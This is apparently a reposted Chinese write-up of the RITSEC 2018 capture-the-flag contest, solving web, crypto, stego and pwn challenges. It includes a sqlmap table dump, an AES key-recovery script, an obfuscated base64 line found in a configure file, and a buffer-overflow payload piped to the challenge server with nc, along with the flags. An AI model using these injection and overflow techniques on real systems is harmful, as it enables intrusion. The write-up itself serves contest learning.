内容简介:打开网站,好像可以提供搜索功能抓个包,试试注入sqlmap -r burp.txt -D challenge -T spaceships --dump
Space Force
The Space Force has created a portal for the public to learn about and be in awe of our most elite Space Force Fighters. Check it out at fun.ritsec.club:8005!
打开网站,好像可以提供搜索功能
抓个包,试试注入
POST /index.php HTTP/1.1 Host: fun.ritsec.club:8005 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://fun.ritsec.club:8005/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 16 Connection: keep-alive Upgrade-Insecure-Requests: 1 name=The+Javelin
sqlmap -r burp.txt -D challenge -T spaceships --dump
flag:RITSEC{hey_there_h4v3_s0me_point$_3ny2Lx}
Burn the candle on both ends
常规套路.藏了个zip,分解就可以了
可是还有密码,经过很久很久的爆破,密码为stegosaurus
flag:RITSEC{8U51N355-1N-7H3-Fr0N7-P4r7Y-1N-7H3-84CK}
I am a Stegosaurus
下载图片下来,linux打不开,可能是修改了图片的高或者宽,放到windows直接可以打开,flag就在图片下方
flag:RITSEC{th1nk_0uts1d3_th3_b0x}
Nobody uses the eggplant emoji
这是个脑洞大开的题目,密文全是表情包
题目:
发现这些表情包中还夹杂这一些下划线,可以尝试将这些表情包转化为不同的字符来
得到ABCDEFCGHAIJCDEFCKLMCNELGHDCEBCGHMCBOKPCBALQGCDEFCRFQGCKIQNMLCGHMQMCGHLMMCSFMQGAEIQTCNHKGCAQCDEFCIKRMUCNHKGCAQCDEFLCSFMQGUCNHKGCAQCGHMCKALCQVMMWCXMOEYAGDCEBCKICFIOKWMICQNKOOENTCDEFLCBOKPCAQZCKBLAYKI[EL[MFLEVMKI[QNKOOEN[NEN[GHMLMQ[K[WABBMLMIYMC
再通过 词频分析 得到IFSYOUSTHINGSYOUSARESWORTHYSOFSTHESFLAMSFIRDTSYOUSJUDTSANDWERSTHEDESTHREESQUEDTIONDPSWHATSIDSYOUSNAJEVSWHATSIDSYOURSQUEDTVSWHATSIDSTHESAIRSDBEEKSZELOCITYSOFSANSUNLAKENSDWALLOWPSYOURSFLAMSIDXSAFRICAN[OR[EUROBEAN[DWALLOW[WOW[THERED[A[KIFFERENCES
经过替换字符
flag:RITSEC{african_or_european_swallow_wow_theres_a_difference}
Who drew on my program?
下载图片
百度了一下,发现好像是原题, https://github.com/dqi/ctf_writeup/tree/master/2015/tmctf/crypto200
跟这个题很像
也是划掉一些关键的信息,求出flag,看看他的payload
#!/usr/bin/python from Crypto.Cipher import AES import binascii import string import itertools # given bKEY = "5d6I9pfR7C1JQt" # use null bytes to minimize effect on output IV = "\x00"*16 def encrypt(message, passphrase): aes = AES.new(passphrase, AES.MODE_CBC, IV) return aes.encrypt(message) def decrypt(cipher, passphrase): aes = AES.new(passphrase, AES.MODE_CBC, IV) return aes.decrypt(cipher) pt = "The message is protected by AES!" ct = "fe000000000000000000000000009ec3307df037c689300bbf2812ff89bc0b49" # find the key using the plaintext and ciphertext we know, since the IV has no effect on the decryption of the second block for i in itertools.product(string.printable, repeat=2): eKEY = ''.join(i) KEY = bKEY + eKEY ptc = decrypt(binascii.unhexlify(ct), KEY) if ptc[16] == pt[16] and ptc[30] == pt[30] and ptc[31] == pt[31]: print "Got KEY: " + str(KEY) fKEY = KEY pt2 = binascii.hexlify(decrypt(binascii.unhexlify(ct), fKEY))[32:] print "Decrypting with CT mostly zeroes gives: " + pt2 print "Should be: " + binascii.hexlify(pt[16:]) # we can now recover the rest of the ciphertext ct by XOR(pt[i], decrypted[i], since we chose ct 00 in all the positions we are going to recover answer = "" for i in range(13): pi = pt[17+i] # letters from the plaintext pti = pt2[2*i+2:2*i+4] # 2 hex letters from decryption of second block answer += "%02X" % (ord(pi) ^ int(pti, 16)) rct = ct[0:2] + answer.lower() + ct[28:] print "Which means CT was: " + rct # now we can decrypt the recovered ct and xor against the pt to recover the IV wpt = decrypt(binascii.unhexlify(rct), fKEY) IV = "" for i in range(16): p = ord(pt[i]) ^ ord(wpt[i]) IV += "%02X" % p IV = binascii.unhexlify(IV) # sanity check: aes = AES.new(fKEY, AES.MODE_CBC, IV) print "Sanity check: " + aes.decrypt(binascii.unhexlify(rct)) # We won! print "The IV is: " + IV
将bKEY改成我们题目上面的
#!/usr/bin/python from Crypto.Cipher import AES import binascii import string import itertools # given bKEY = "9aF738g9AkI112" # use null bytes to minimize effect on output IV = "\x00"*16 def encrypt(message, passphrase): aes = AES.new(passphrase, AES.MODE_CBC, IV) return aes.encrypt(message) def decrypt(cipher, passphrase): aes = AES.new(passphrase, AES.MODE_CBC, IV) return aes.decrypt(cipher) pt = "The message is protected by AES!" ct = "9e00000000000000000000000000436a808e200a54806b0e94fb9633db9d67f0" # find the key using the plaintext and ciphertext we know, since the IV has no effect on the decryption of the second block for i in itertools.product(string.printable, repeat=2): eKEY = ''.join(i) KEY = bKEY + eKEY ptc = decrypt(binascii.unhexlify(ct), KEY) if ptc[16] == pt[16] and ptc[30] == pt[30] and ptc[31] == pt[31]: print "Got KEY: " + str(KEY) fKEY = KEY pt2 = binascii.hexlify(decrypt(binascii.unhexlify(ct), fKEY))[32:] print "Decrypting with CT mostly zeroes gives: " + pt2 print "Should be: " + binascii.hexlify(pt[16:]) # we can now recover the rest of the ciphertext ct by XOR(pt[i], decrypted[i], since we chose ct 00 in all the positions we are going to recover answer = "" for i in range(13): pi = pt[17+i] # letters from the plaintext pti = pt2[2*i+2:2*i+4] # 2 hex letters from decryption of second block answer += "%02X" % (ord(pi) ^ int(pti, 16)) rct = ct[0:2] + answer.lower() + ct[28:] print "Which means CT was: " + rct # now we can decrypt the recovered ct and xor against the pt to recover the IV wpt = decrypt(binascii.unhexlify(rct), fKEY) IV = "" for i in range(16): p = ord(pt[i]) ^ ord(wpt[i]) IV += "%02X" % p IV = binascii.unhexlify(IV) # sanity check: aes = AES.new(fKEY, AES.MODE_CBC, IV) print "Sanity check: " + aes.decrypt(binascii.unhexlify(rct)) # We won! print "The IV is: " + IV
flag:RITSEC{b4dcbc#g}
Talk to me
加入频道: https://discord.gg/p7tHuSq
搜索RITSEC
flag:RITSEC{its_like_irc-but_with_2_much_javascript}
Patch Patch
查看下patch-patch-patch文件
diff -ur patch-2.7.1/src/patch.c patch-2.7.1.1/src/patch.c
--- patch-2.7.1/src/patch.c 2018-11-02 01:12:30.625613158 -0400
+++ patch-2.7.1.1/src/patch.c 2018-11-02 01:13:21.498608985 -0400
@@ -1953,9 +1953,9 @@
fatal_exit (int sig)
{
cleanup ();
-#ifdef backdoor
- printf("Looks like we got a vulnerability here");
-#endif
+
+/* Removed a super bad vuln here */
+
if (sig)
exit_with_signal (sig);
并没有什么有用的东西,在看看patch-2.7.1-10.el7.centos.src,把它全部解压,发现其中的patch-2.7.1中的configure有个奇怪的东西
TEST=$(echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`)
是个bash脚本,我们尝试运行下
echo -e "\x55\x6b\x6c\x55\x55\x30\x56\x44\x65\x31\x5a\x56\x54\x45\x35\x54\x58\x7a\x52\x53\x4d\x31\x39\x43\x51\x55\x52\x66\x66\x51\x6f\x3d" | `echo -e "\x62\x61\x73\x65\x36\x34" -d`
RITSEC{VULNS_4R3_BAD_}
flag:RITSEC{VULNS_4R3_BAD_}
What_Th._Fgck
题目就给了这个
OGK:DI_G;lqk"Kj1;"a"yao";fr3dog0o"vdtnsaoh"patsfk{+
这是个dvorak密码,下面是关于dvorak的键盘分布图
直接使用 工具
得到明文RITSEC{Isn't”Th1s”a”far”sup3eri0r”keyboard”layout?}
将其双引号改成下划线就可以了
flag:RITSEC{Isn't_Th1s_a_far_sup3eri0r_keyboard_layout?}
RIP
这个给了一张图和一段密文
+[----->+++<]>+.++++++++++++..----.+++.+[-->+<]>.-----------..++[--->++<]>+...---[++>---<]>.--[----->++<]>+.----------.++++++.-.+.+[->+++<]>.+++.[->+++<]>-.--[--->+<]>-.++++++++++++.--.+++[->+++++<]>-.++[--->++<]>+.-[->+++<]>-.--[--->+<]>-.++[->+++<]>+.+++++.++[->+++<]>+.----[->++<]>.[-->+<]>++.+++++++++.--[------>+<]>.--[-->+++<]>--.+++++++++++++.----------.>--[----->+<]>.-.>-[--->+<]>--.++++.---------.-.
解密之后是个链接 https://www.youtube.com/watch?v=F6LYOfeSWNM
没什么用,再看看图片,这个图片的奇怪之处在于他的周围是些彩色的小方块,c查了下才知道这些是一种编程语言PIET,我们把图片中的其他部分去掉
在线 解密
flag:RITSEC{WH4AT_TH3_P13T_1337}
Check out this cool filter
这个毫无头绪,看了大佬的wp才知道
from PIL import Image
img = Image.open('CheckOutThisFilter.png').convert('RGB')
w, h = img.size
codes = []
for y in range(0, h):
for x in range(0, w):
r, g, b = img.getpixel((x, y))
codes.append(b)#得到图片的blue值的排列
codes = codes[:51]
flag = ''
for code in codes:
flag += chr(code - 13)
print flag
flag:RITSEC{TIL_JPEG_COMPRESSION_MESSES_WITH_RGB_VALUES}
music.png
这个题也是大开眼界,这是一种新的音乐类型,被命名为“bytebeat”。
使用脚本从图片中提取出代码
from PIL import Image
img = Image.open('music.png').convert('RGB')
w, h = img.size
r_str = ''
g_str = ''
b_str = ''
for y in range(0, h):
for x in range(0, w):
r, g, b = img.getpixel((x, y))
r_str += chr(r)
g_str += chr(g)
b_str += chr(b)
s = r_str[:32] + g_str[:38] + b_str[:66]
print s
得到(t<<3)*[8/9,1,9/8,6/5,4/3,3/2,0][[0xd2d2c7,0xce4087,0xca32c7,0x8e4008][t>>14&3.1]>>(0x3dbe4687>>((t>>10&15)>9?18:t>>10&15)*3&7.1)*3&7.1]
通过在线工具 运行
播放了一段音乐,听歌识曲为「Never Gonna Give You Up」
所以flag为:RITSEC{never_gonna_give_you_up}
关于bytebeat的介绍 点我
ezpwn
拖到ida中查看
大概代码如下
int main(){
int x = 0;
char buffer;
FILE *f;
puts("Please enter your API key");
gets(&buffer);
f = fopen("flag.txt","r");
if(x==1){
while(y != -1){
y=fgetc(f); // Acts like the decrement
putchar(y);
fclose(f);
}
}
printf("%d\n",x);
}
定义了一个x为0,可是只有当x=1的时候才可以读取flag,其中关键的函数还是gets,可以来修改x的值,首先我们确定偏移量
└──╼ $./ezpwn Please enter your API key aaaabaaacaaadaaaeaaafaaagaaaha 1633771879
使用cyclic得到偏移量为24,在本地写个flag.txt,构造python -c 'print "A"*24 +"\x01" ' | ./ezpwn
└──╼ $python -c 'print "A"*24 +"\x01" ' | ./ezpwn
Please enter your API key
flag{666666}
1
本地成功
root@kali:~/pwn# python -c "print 'a'*24 + '\x01\x00\x00\x00'"| nc fun.ritsec.club 8001
Please enter your API key
RITSEC{Woah_Dud3_it's_really_that_easy?_am_i_leet_yet?}1
得到flag
flag:RITSEC{Woah_Dud3_it's_really_that_easy?_am_i_leet_yet?}
以上所述就是小编给大家介绍的《RITSEC2018》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Learning Vue.js 2
Olga Filipova / Packt Publishing / 2017-1-5 / USD 41.99
About This Book Learn how to propagate DOM changes across the website without writing extensive jQuery callbacks code.Learn how to achieve reactivity and easily compose views with Vue.js and unders......一起来看看 《Learning Vue.js 2》 这本书的介绍吧!
